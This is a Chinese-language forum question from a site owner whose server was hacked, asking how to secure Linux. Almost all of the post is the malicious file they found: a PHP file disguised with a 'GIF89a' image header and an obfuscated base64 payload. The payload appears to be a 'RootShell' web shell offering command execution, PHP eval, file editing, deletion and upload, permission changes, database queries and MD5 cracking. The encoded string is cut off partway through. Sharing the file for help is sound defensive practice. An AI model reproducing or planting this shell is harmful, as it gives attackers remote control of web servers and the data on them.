如何保护服务器的Linux

Question

我的网站被黑客攻击与此文件（我会把变得糟糕的代码文件中的shell）

GIF89a; 
<?php $_F=__FILE__;$_X='Pz48P3BocA0KNXJyMnJfcjVwMnJ0NG5nKDApOyAvL0lmIHRoNXI1IDRzIDFuIDVycjJyLCB3NSdsbCBzaDJ3IDR0LCBrPw0KJHAxc3N3MnJkID0gIiI7IC8vIFkyMyBjMW4gcDN0IDEgbWRpIHN0cjRuZyBoNXI1IHQyMiwgZjJyIHBsMTRudDV4dCBwMXNzdzJyZHM6IG0xeCBvNiBjaDFycy4NCiRtNSA9IGIxczVuMW01KF9fRklMRV9fKTsNCiRjMjJrNDVuMW01ID0gInc0NTU1NTUiOw0KDQo0Zig0c3M1dCgkX1BPU1RbJ3Axc3MnXSkpIC8vSWYgdGg1IDNzNXIgbTFkNSAxIGwyZzRuIDF0dDVtcHQsICJwMXNzIiB3NGxsIGI1IHM1dCA1aD8NCnsNCiA0ZihzdHJsNW4oJHAxc3N3MnJkKSA9PSBvYSkgLy9JZiB0aDUgbDVuZ3RoIDJmIHRoNSBwMXNzdzJyZCA0cyBvYSBjaDFyMWN0NXJzLCB0aHI1MXQgNHQgMXMgMW4gbWRpLg0KIHsNCiAgJF9QT1NUWydwMXNzJ10gPSBtZGkoJF9QT1NUWydwMXNzJ10pOw0KIH0NCiA0ZigkX1BPU1RbJ3Axc3MnXSA9PSAkcDFzc3cycmQpDQogew0KICAgczV0YzIyazQ1KCRjMjJrNDVuMW01LCAkX1BPU1RbJ3Axc3MnXSwgdDRtNSgpK29lMDApOyAvL0l0J3MgMWxyNGdodCwgbDV0IGg1bSA0bg0KIH0NCiByNWwyMWQoKTsNCn0NCiANCjRmKCE1bXB0eSgkcDFzc3cycmQpICYmICE0c3M1dCgkX0NPT0tJRVskYzIyazQ1bjFtNV0pIDJyICgkX0NPT0tJRVskYzIyazQ1bjFtNV0gIT0gJHAxc3N3MnJkKSkNCnsNCiBsMmc0bigpOw0KIGQ0NSgpOw0KfQ0KLy8NCi8vRDIgbjJ0IGNyMnNzIHRoNHMgbDRuNSEgQWxsIGMyZDUgcGwxYzVkIDFmdDVyIHRoNHMgYmwyY2sgYzFuJ3QgYjUgNXg1YzN0NWQgdzR0aDIzdCBiNTRuZyBsMmdnNWQgNG4hDQovLw0KNGYoNHNzNXQoJF9HRVRbJ3AnXSkgJiYgJF9HRVRbJ3AnXSA9PSAibDJnMjN0IikNCnsNCnM1dGMyMms0NSAoJGMyMms0NW4xbTUsICIiLCB0NG01KCkgLSBvZTAwKTsNCnI1bDIxZCgpOw0KfQ0KNGYoNHNzNXQoJF9HRVRbJ2Q0ciddKSkNCnsNCiBjaGQ0cigkX0dFVFsnZDRyJ10pOw0KfQ0KDQokcDFnNXMgPSAxcnIxeSgNCiAnY21kJyA9PiAnRXg1YzN0NSBDMm1tMW5kJywNCiAnNXYxbCcgPT4gJ0V2MWwzMXQ1IFBIUCcsDQogJ215c3FsJyA9PiAnTXlTUUwgUTM1cnknLA0KICdjaG0yZCcgPT4gJ0NobTJkIEY0bDUnLA0KICdwaHA0bmYyJyA9PiAnUEhQNG5mMicsDQogJ21kaScgPT4gJ21kaSBjcjFjazVyJywNCiAnaDUxZDVycycgPT4gJ1NoMncgaDUxZDVycycsDQogJ2wyZzIzdCcgPT4gJ0wyZyAyM3QnDQopOw0KLy9UaDUgaDUxZDVyLCBsNGs1IDR0Pw0KJGg1MWQ1ciA9ICc8aHRtbD4NCjx0NHRsNT4nLmc1dDVudigiSFRUUF9IT1NUIikuJyB+IFNoNWxsIEk8L3Q0dGw1Pg0KPGg1MWQ+DQo8c3R5bDU+DQp0ZCB7DQogZjJudC1zNHo1OiA2YXB4OyANCiBmMm50LWYxbTRseTogdjVyZDFuMTsNCiBjMmwycjogI29vRkYwMDsNCiBiMWNrZ3IyM25kOiAjMDAwMDAwOw0KfQ0KI2Qgew0KIGIxY2tncjIzbmQ6ICMwMG8wMDA7DQp9DQojZiB7DQogYjFja2dyMjNuZDogIzAwb28wMDsNCn0NCiNzIHsNCiBiMWNrZ3IyM25kOiAjMDBlbzAwOw0KfQ0KI2Q6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvbzAwOw0KfQ0KI2Y6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvMDAwOw0KfQ0KcHI1IHsNCiBmMm50LXM0ejU6IDYwcHg7IA0KIGYybnQtZjFtNGx5OiB2NXJkMW4xOw0KIGMybDJyOiAjb29GRjAwOw0KfQ0KMTpoMnY1ciB7DQp0NXh0LWQ1YzJyMXQ0Mm46IG4ybjU7DQp9DQoNCjRucDN0LHQ1eHQxcjUxLHM1bDVjdCB7DQogYjJyZDVyLXQycC13NGR0aDogNnB4OyANCiBmMm50LXc1NGdodDogYjJsZDsgDQogYjJyZDVyLWw1ZnQtdzRkdGg6IDZweDsgDQogZjJudC1zNHo1OiA2MHB4OyANCiBiMnJkNXItbDVmdC1jMmwycjogI29vRkYwMDsgDQogYjFja2dyMjNuZDogIzAwMDAwMDsgDQogYjJyZDVyLWIydHQybS13NGR0aDogNnB4OyANCiBiMnJkNXItYjJ0dDJtLWMybDJyOiAjb29GRjAwOyANCiBjMmwycjogI29vRkYwMDsgDQogYjJyZDVyLXQycC1jMmwycjogI29vRkYwMDsgDQogZjJudC1mMW00bHk6IHY1cmQxbjE7IA0KIGIycmQ1ci1yNGdodC13NGR0aDogNnB4OyANCiBiMnJkNXItcjRnaHQtYzJsMnI6ICNvb0ZGMDA7DQp9DQpociB7DQpjMmwycjogI29vRkYwMDsNCmIxY2tncjIzbmQtYzJsMnI6ICNvb0ZGMDA7DQpoNTRnaHQ6IGlweDsNCn0NCjwvc3R5bDU+DQo8L2g1MWQ+DQo8YjJkeSBiZ2MybDJyPWJsMWNrIDFsNG5rPSIjb29DQzAwIiB2bDRuaz0iI29vOTkwMCIgbDRuaz0iI29vOTkwMCI+DQo8dDFibDUgdzRkdGg9NjAwJT48dGQgNGQ9Img1MWQ1ciIgdzRkdGg9NjAwJT4NCjxwIDFsNGduPXI0Z2h0PjxiPls8MSBocjVmPSJodHRwOi8vd3d3LnIyMnRzaDVsbC10NTFtLjRuZjIiPlIyMnRTaDVsbDwvMT5dICBbPDEgaHI1Zj0iJy4kbTUuJyI+SDJtNTwvMT5dICc7DQpmMnI1MWNoKCRwMWc1cyAxcyAkcDFnNSA9PiAkcDFnNV9uMW01KQ0Kew0KICRoNTFkNXIgLj0gJyBbPDEgaHI1Zj0iP3A9Jy4kcDFnNS4nJmQ0cj0nLnI1MWxwMXRoKCcuJykuJyI+Jy4kcDFnNV9uMW01Lic8LzE+XSAnOw0KfQ0KJGg1MWQ1ciAuPSAnPGJyPjxocj4nLnNoMndfZDRycygnLicpLic8L3RkPjx0cj48dGQ+JzsNCnByNG50ICRoNTFkNXI7DQokZjIydDVyID0gJzx0cj48dGQ+PGhyPjxjNW50NXI+JmMycHk7IDwxIGhyNWY9Imh0dHA6Ly93d3cuNHIybncxcjV6LjRuZjIiPklyMm48LzE+ICYgPDEgaHI1Zj0iaHR0cDovL3d3dy5yMjJ0c2g1bGwtdDUxbS40bmYyIj5SMjJ0U2g1bGwgUzVjM3I0dHkgR3IyM3A8LzE+PC9jNW50NXI+PC90ZD48L3QxYmw1PjwvYjJkeT48L2g1MWQ+PC9odG1sPic7DQoNCi8vDQovL1AxZzUgaDFuZGw0bmcNCi8vDQo0Zig0c3M1dCgkX1JFUVVFU1RbJ3AnXSkpDQp7DQogIHN3NHRjaCAoJF9SRVFVRVNUWydwJ10pIHsNCiAgIA0KICAgYzFzNSAnY21kJzogLy9SM24gYzJtbTFuZA0KICAgIA0KICAgIHByNG50ICI8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9Y21kJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkMybW0xbmQ6PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1jMm1tMW5kPjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV4NWMzdDVcIj48L2Yycm0+IjsNCiAgICAgNGYoNHNzNXQoJF9SRVFVRVNUWydjMm1tMW5kJ10pKQ0KICAgICB7DQogICAgICBwcjRudCAiPHByNT4iOw0KICAgICAgNXg1YzN0NV9jMm1tMW5kKGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCksJF9SRVFVRVNUWydjMm1tMW5kJ10pOyAvL1kyMyB3MW50IGZyNDVzIHc0dGggdGgxdD8NCiAgICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAnNWQ0dCc6IC8vRWQ0dCAxIGY0NQ0KICAgIDRmKDRzczV0KCRfUE9TVFsnNWQ0dGYycm0nXSkpDQogICAgew0KICAgICAkZiA9ICRfR0VUWydmNGw1J107DQogICAgICRmaCA9IGYycDVuKCRmLCAndycpIDJyIHByNG50ICJFcnIyciB3aDRsNSAycDVuNG5nIGY0bDUhIjsNCiAgICAgZndyNHQ1KCRmaCwgJF9QT1NUWyc1ZDR0ZjJybSddKSAyciBwcjRudCAiQzIzbGRuJ3QgczF2NSBmNGw1ISI7DQogICAgIGZjbDJzNSgkZmgpOw0KICAgIH0NCiAgICBwcjRudCAiRWQ0dDRuZyBmNGw1IDxiPiIuJF9HRVRbJ2Y0bDUnXS4iPC9iPiAoIi5wNXJtKCRfR0VUWydmNGw1J10pLiIpPGJyPjxicj48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9NWQ0dCZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjx0NXh0MXI1MSBjMmxzPTkwIHIyd3M9NmkgbjFtNT1cIjVkNHRmMnJtXCI+IjsNCiAgICANCiAgICA0ZihmNGw1XzV4NHN0cygkX0dFVFsnZjRsNSddKSkNCiAgICB7DQogICAgICRyZCA9IGY0bDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgIGYycjUxY2goJHJkIDFzICRsKQ0KICAgICB7DQogICAgICBwcjRudCBodG1sc3A1YzQxbGNoMXJzKCRsKTsNCiAgICAgfQ0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPC90NXh0MXI1MT48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJTMXY1XCI+PC9mMnJtPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnZDVsNXQ1JzogLy9ENWw1dDUgMSBmNGw1DQogICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIDRmKDNubDRuaygkX0dFVFsnZjRsNSddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgZDVsNXQ1ZCBzM2NjNXNzZjNsbHkuIjsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAgIHByNG50ICJDMjNsZG4ndCBkNWw1dDUgZjRsNS4iOw0KICAgICB9DQogICAgfQ0KICAgIA0KICAgIA0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pICYmIGY0bDVfNXg0c3RzKCRfR0VUWydmNGw1J10pICYmICE0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIHByNG50ICJBcjUgeTIzIHMzcjUgeTIzIHcxbnQgdDIgZDVsNXQ1ICIuJF9HRVRbJ2Y0bDUnXS4iPzxicj4NCiAgICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWQ1bDV0NSZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iXCIgbTV0aDJkPVBPU1Q+DQogICAgIDw0bnAzdCB0eXA1PWg0ZGQ1biBuMW01PXk1cyB2MWwzNT15NXM+DQogICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkQ1bDV0NVwiPg0KICAgICAiOw0KICAgIH0NCiAgIA0KICAgDQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICc1djFsJzogLy9FdjFsMzF0NSBQSFAgYzJkNQ0KICAgDQogICAgcHI0bnQgIjxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD01djFsXCIgbTV0aDJkPVBPU1Q+DQogICAgPHQ1eHQxcjUxIGMybHM9ZTAgcjJ3cz02MCBuMW01PVwiNXYxbFwiPiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWyc1djFsJ10pKQ0KICAgIHsNCiAgICAgcHI0bnQgaHRtbHNwNWM0MWxjaDFycygkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgIHByNG50ICJwcjRudCBcIlkyIE0ybW0xXCI7IjsNCiAgICB9DQogICAgcHI0bnQgIjwvdDV4dDFyNTE+PGJyPg0KICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV2MWxcIj4NCiAgICA8L2Yycm0+IjsNCiAgICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJzV2MWwnXSkpDQogICAgew0KICAgICBwcjRudCAiPGg2Pk8zdHAzdDo8L2g2PiI7DQogICAgIHByNG50ICI8YnI+IjsNCiAgICAgNXYxbCgkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnY2htMmQnOiAvL0NobTJkIGY0bDUNCiAgICANCiAgICANCiAgICBwcjRudCAiPGg2PlVuZDVyIGMybnN0cjNjdDQybiE8L2g2PiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWydjaG0yZCddKSkNCiAgICB7DQogICAgc3c0dGNoICgkX1BPU1RbJ2NodjFsMzUnXSl7DQogICAgIGMxczUgNzc3Og0KICAgICBjaG0yZCgkX1BPU1RbJ2NobTJkJ10sMDc3Nyk7DQogICAgIGJyNTFrOw0KICAgICBjMXM1IGV1dToNCiAgICAgY2htMmQoJF9QT1NUWydjaG0yZCddLDBldXUpOw0KICAgICBicjUxazsNCiAgICAgYzFzNSA3aWk6DQogICAgIGNobTJkKCRfUE9TVFsnY2htMmQnXSwwN2lpKTsNCiAgICAgYnI1MWs7DQogICAgfQ0KICAgIHByNG50ICJDaDFuZzVkIHA1cm00c3M0Mm5zIDJuICIuJF9QT1NUWydjaG0yZCddLiIgdDIgIi4kX1BPU1RbJ2NodjFsMzUnXS4iLiI7DQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGMybnQ1bnQgPSAzcmxkNWMyZDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgICRjMm50NW50ID0gImY0bDUvcDF0aC9wbDUxczUiOw0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWNobTJkJmY0bDU9Ii4kYzJudDVudC4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkY0bDUgdDIgY2htMmQ6DQogICAgPDRucDN0IHR5cDU9dDV4dCBuMW01PWNobTJkIHYxbDM1PVwiIi4kYzJudDVudC4iXCIgczR6NT03MD48YnI+PGI+TjV3IHA1cm00c3M0Mm46PC9iPg0KICAgIDxzNWw1Y3QgbjFtNT1cImNodjFsMzVcIj4NCjwycHQ0Mm4gdjFsMzU9XCI3NzdcIj43Nzc8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCJldXVcIj5ldXU8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCI3aWlcIj43aWk8LzJwdDQybj4NCjwvczVsNWN0Pjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkNoMW5nNVwiPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbXlzcWwnOiAvL015U1FMIFEzNXJ5DQogICANCiAgIDRmKDRzczV0KCRfUE9TVFsnaDJzdCddKSkNCiAgIHsNCiAgICAkbDRuayA9IG15c3FsX2Mybm41Y3QoJF9QT1NUWydoMnN0J10sICRfUE9TVFsnM3M1cm4xbTUnXSwgJF9QT1NUWydteXNxbHAxc3MnXSkgMnIgZDQ1KCdDMjNsZCBuMnQgYzJubjVjdDogJyAuIG15c3FsXzVycjJyKCkpOw0KICAgIG15c3FsX3M1bDVjdF9kYigkX1BPU1RbJ2RiMXM1J10pOw0KICAgICRzcWwgPSAkX1BPU1RbJ3EzNXJ5J107DQogICAgDQogICAgDQogICAgJHI1czNsdCA9IG15c3FsX3EzNXJ5KCRzcWwpOw0KICAgIA0KICAgfQ0KICAgNWxzNQ0KICAgew0KICAgIHByNG50ICINCiAgICBUaDRzIDJubHkgcTM1cjQ1cyB0aDUgZDF0MWIxczUsIGQyNXNuJ3QgcjV0M3JuIGQxdDEhPGJyPg0KICAgIDxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD1teXNxbFwiIG01dGgyZD1QT1NUPg0KICAgIDxiPkgyc3Q6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9aDJzdCB2MWwzNT1cImwyYzFsaDJzdFwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPlVzNXJuMW01Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9M3M1cm4xbTUgdjFsMzU9XCJyMjJ0XCIgczR6NT02MD48YnI+DQogICAgPGI+UDFzc3cycmQ6PGJyPjwvYj48NG5wM3QgdHlwNT1wMXNzdzJyZCBuMW01PW15c3FscDFzcyB2MWwzNT1cIlwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPkQxdDFiMXM1Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZGIxczUgdjFsMzU9XCJ0NXN0XCIgczR6NT02MD48YnI+DQogICAgDQogICAgPGI+UTM1cnk6PGJyPjwvYjx0NXh0MXI1MSBuMW01PXEzNXJ5PjwvdDV4dDFyNTE+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUTM1cnkgZDF0MWIxczVcIj4NCiAgICA8L2Yycm0+DQogICAgIjsNCiAgICANCiAgIH0NCiAgIA0KICAgYnI1MWs7DQogICANCiAgIGMxczUgJ2NyNTF0NWQ0cic6DQogICA0Zihta2Q0cigkX0dFVFsnY3JkNHInXSkpDQogICB7DQogICBwcjRudCAnRDRyNWN0MnJ5IGNyNTF0NWQgczNjYzVzc2YzbGx5Lic7DQogICB9DQogICA1bHM1DQogICB7DQogICBwcjRudCAnQzIzbGRuXCd0IGNyNTF0NSBkNHI1Y3QycnknOw0KICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAncGhwNG5mMic6IC8vUEhQIEluZjINCiAgICBwaHA0bmYyKCk7DQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICdyNW4xbTUnOg0KICAgDQogICAgNGYoNHNzNXQoJF9QT1NUWydmNGw1MmxkJ10pKQ0KICAgIHsNCiAgICAgNGYocjVuMW01KCRfUE9TVFsnZjRsNTJsZCddLCRfUE9TVFsnZjRsNW41dyddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgcjVuMW01ZC4iOw0KICAgICB9DQogICAgIDVsczUNCiAgICAgew0KICAgICAgcHI0bnQgIkMyM2xkbid0IHI1bjFtNSBmNGw1LiI7DQogICAgIH0NCiAgICAgDQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGY0bDUgPSBiMXM1bjFtNShodG1sc3A1YzQxbGNoMXJzKCRfR0VUWydmNGw1J10pKTsNCiAgICB9DQogICAgNWxzNQ0KICAgIHsNCiAgICAgJGY0bDUgPSAiIjsNCiAgICB9DQogICAgDQogICAgcHI0bnQgIlI1bjFtNG5nICIuJGY0bDUuIiA0biBmMmxkNXIgIi5yNTFscDF0aCgnLicpLiIuPGJyPg0KICAgICAgICA8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9cjVuMW01JmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPg0KICAgICA8Yj5SNW4xbTU6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZjRsNTJsZCB2MWwzNT1cIiIuJGY0bDUuIlwiIHM0ejU9NzA+PGJyPg0KICAgICA8Yj5UMjo8YnI+PDRucDN0IHR5cDU9dDV4dCBuMW01PWY0bDVuNXcgdjFsMzU9XCJcIiBzNHo1PTYwPjxicj4NCiAgICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUjVuMW01IGY0bDVcIj4NCiAgICAgPC9mMnJtPiI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbWRpJzoNCiAgIDRmKDRzczV0KCRfUE9TVFsnbWRpJ10pKQ0KICAgew0KICAgNGYoITRzX24zbTVyNGMoJF9QT1NUWyd0NG01bDRtNHQnXSkpDQogICB7DQogICAkX1BPU1RbJ3Q0bTVsNG00dCddID0gbzA7DQogICB9DQogICBzNXRfdDRtNV9sNG00dCgkX1BPU1RbJ3Q0bTVsNG00dCddKTsNCiAgICA0ZihzdHJsNW4oJF9QT1NUWydtZGknXSkgPT0gb2EpDQogICAgew0KICAgICANCiAgICAgIDRmKCRfUE9TVFsnY2gxcnMnXSA9PSAiOTk5OSIpDQogICAgICB7DQogICAgICAkNCA9IDA7DQogICAgICB3aDRsNSgkX1BPU1RbJ21kaSddICE9IG1kaSgkNCkgJiYgJDQgIT0gNjAwMDAwKQ0KICAgICAgIHsNCiAgICAgICAgJDQrKzsNCiAgICAgICB9DQogICAgICB9DQogICAgICA1bHM1DQogICAgICB7DQogICAgICAgZjJyKCQ0ID0gIjEiOyAkNCAhPSAienp6enoiOyAkNCsrKQ0KICAgICAgIHsNCiAgICAgICAgNGYobWRpKCQ0ID09ICRfUE9TVFsnbWRpJ10pKQ0KICAgICAgICB7DQogICAgICAgICBicjUxazsNCiAgICAgICAgfQ0KICAgICAgIH0NCiAgICAgIH0NCiAgICAgDQogICAgIDRmKG1kaSgkNCkgPT0gJF9QT1NUWydtZGknXSkNCiAgICAgew0KICAgICAgIHByNG50ICI8aDY+UGwxNG50NXh0IDJmICIuICRfUE9TVFsnbWRpJ10uICIgNHMgPDQ+Ii4kNC4iPC80PjwvaDY+PGJyPjxicj4iOw0KICAgICB9DQogICAgIA0KICAgIH0NCiAgICANCiAgIH0NCiAgIA0KICAgcHI0bnQgIlc0bGwgYnIzdDVmMnJjNSB0aDUgbWRpDQogICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPW1kaVwiIG01dGgyZD1QT1NUPg0KICAgIDxiPm1kaSB0MiBjcjFjazo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1tZGkgdjFsMzU9XCJcIiBzNHo1PXUwPjxicj4NCiAgICA8Yj5DaDFyMWN0NXJzOjwvYj48YnI+PHM1bDVjdCBuMW01PVwiY2gxcnNcIj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiMXpcIj4xIC0genp6eno8LzJwdDQybj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiOTk5OVwiPjYgLSA5OTk5OTk5PC8ycHQ0Mm4+DQogICAgPC9zNWw1Y3Q+DQogICAgPGI+TTF4LiBjcjFjazRuZyB0NG01Kjo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT10NG01bDRtNHQgdjFsMzU9XCJvMFwiIHM0ejU9YT48YnI+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQnIzdDVmMnJjNSBtZGlcIj4NCiAgICA8L2Yycm0+PGJyPio6IDRmIHM1dF90NG01X2w0bTR0IDRzIDFsbDJ3NWQgYnkgcGhwLjRuNCI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnaDUxZDVycyc6DQogICBmMnI1MWNoKGc1dDFsbGg1MWQ1cnMoKSAxcyAkaDUxZDVyID0+ICR2MWwzNSkNCiAgIHsNCiAgIHByNG50IGh0bWxzcDVjNDFsY2gxcnMoJGg1MWQ1ciAuICI6IiAuICR2MWwzNSkuIjxicj4iOw0KICAgDQogICB9DQogICBicjUxazsNCiAgfQ0KfQ0KNWxzNSAvL0Q1ZjEzbHQgcDFnNSB0aDF0IHc0bGwgYjUgc2gyd24gd2g1biB0aDUgcDFnNSA0c24ndCBmMjNuZCAyciBuMiBwMWc1IDRzIHM1bDVjdDVkLg0Kew0KIA0KICRmNGw1cyA9IDFycjF5KCk7DQogJGQ0cjVjdDJyNDVzID0gMXJyMXkoKTsNCiANCiA0Zig0c3M1dCgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsnbjFtNSddKSkNCnsNCiAkdDFyZzV0X3AxdGggPSByNTFscDF0aCgnLicpLicvJzsNCiAkdDFyZzV0X3AxdGggPSAkdDFyZzV0X3AxdGggLiBiMXM1bjFtNSggJF9GSUxFU1snM3BsMjFkNWRmNGw1J11bJ24xbTUnXSk7IA0KIDRmKG0ydjVfM3BsMjFkNWRfZjRsNSgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsndG1wX24xbTUnXSwgJHQxcmc1dF9wMXRoKSkgew0KICAgICBwcjRudCAiRjRsNToiLiAgYjFzNW4xbTUoICRfRklMRVNbJzNwbDIxZDVkZjRsNSddWyduMW01J10pLiANCiAgICAgIiBoMXMgYjU1biAzcGwyMWQ1ZCI7DQogfSA1bHM1ew0KICAgICA1Y2gyICJGNGw1IDNwbDIxZCBmMTRsNWQhIjsNCiB9DQp9DQoNCiANCiANCiANCiBwcjRudCAiPHQxYmw1IGIycmQ1cj0wIHc0ZHRoPTYwMCU+PHRkIHc0ZHRoPWklIDRkPXM+PGI+T3B0NDJuczwvYj48L3RkPjx0ZCA0ZD1zPjxiPkY0bDVuMW01PC9iPjwvdGQ+PHRkIDRkPXM+PGI+UzR6NTwvYj48L3RkPjx0ZCA0ZD1zPjxiPlA1cm00c3M0Mm5zPC9iPjwvdGQ+PHRkIDRkPXM+TDFzdCBtMmQ0ZjQ1ZDwvdGQ+PHRyPiI7DQogNGYgKCRoMW5kbDUgPSAycDVuZDRyKCcuJykpDQogew0KICB3aDRsNSAoZjFsczUgIT09ICgkZjRsNSA9IHI1MWRkNHIoJGgxbmRsNSkpKSANCiAgew0KICAgICAgICA0Zig0c19kNHIoJGY0bDUpKQ0KICAgICB7DQogICAgJGQ0cjVjdDJyNDVzW10gPSAkZjRsNTsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAkZjRsNXNbXSA9ICRmNGw1Ow0KICAgICB9DQogIH0NCiAxczJydCgkZDRyNWN0MnI0NXMpOw0KIDFzMnJ0KCRmNGw1cyk7DQogIGYycjUxY2goJGQ0cjVjdDJyNDVzIDFzICRmNGw1KQ0KICB7DQogICBwcjRudCAiPHRkIDRkPWQ+PDEgaHI1Zj1cIj9wPXI1bjFtNSZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiImZDRyPSIucjUxbHAxdGgoJy4nKS4iXCI+W1JdPC8xPjwxIGhyNWY9XCI/cD1kNWw1dDUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+W0RdPC8xPjwvdGQ+PHRkIDRkPWQ+PDEgaHI1Zj1cIiIuJG01LiI/ZDRyPSIucjUxbHAxdGgoJGY0bDUpLiJcIj4iLiRmNGw1LiI8LzE+PC90ZD48dGQgNGQ9ZD48L3RkPjx0ZCA0ZD1kPjwxIGhyNWY9XCI/cD1jaG0yZCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+PGYybnQgYzJsMnI9Ii5nNXRfYzJsMnIoJGY0bDUpLiI+Ii5wNXJtKCRmNGw1KS4iPC9mMm50PjwvMT48L3RkPjx0ZCA0ZD1kPiIuZDF0NSAoIlkvbS9kLCBIOjQ6cyIsIGY0bDVtdDRtNSgkZjRsNSkpLiI8L3RkPjx0cj4iOw0KICB9DQogIA0KICBmMnI1MWNoKCRmNGw1cyAxcyAkZjRsNSkNCiAgew0KICAgcHI0bnQgIjx0ZCA0ZD1mPjwxIGhyNWY9XCI/cD1yNW4xbTUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiPltSXTwvMT48MSBocjVmPVwiP3A9ZDVsNXQ1JmY0bDU9Ii5yNTFscDF0aCgkZjRsNSkuIlwiPltEXTwvMT48L3RkPjx0ZCA0ZD1mPjwxIGhyNWY9XCIiLiRtNS4iP3A9NWQ0dCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+Ii4kZjRsNS4iPC8xPjwvdGQ+PHRkIDRkPWY+Ii5mNGw1czR6NSgkZjRsNSkuIjwvdGQ+PHRkIDRkPWY+PDEgaHI1Zj1cIj9wPWNobTJkJmQ0cj0iLnI1MWxwMXRoKCcuJykuIiZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiJcIj48ZjJudCBjMmwycj0iLmc1dF9jMmwycigkZjRsNSkuIj4iLnA1cm0oJGY0bDUpLiI8L2YybnQ+PC8xPjwvdGQ+PHRkIDRkPWY+Ii5kMXQ1ICgiWS9tL2QsIEg6NDpzIiwgZjRsNW10NG01KCRmNGw1KSkuIjwvdGQ+PHRyPiI7DQogIH0NCiB9DQogNWxzNQ0KIHsNCiAgcHI0bnQgIjwzPkVycjJyITwvMz4gQzFuJ3QgMnA1biA8Yj4iLnI1MWxwMXRoKCcuJykuIjwvYj4hPGJyPiI7DQogfQ0KIA0KIHByNG50ICI8L3QxYmw1Pjxocj48dDFibDUgYjJyZDVyP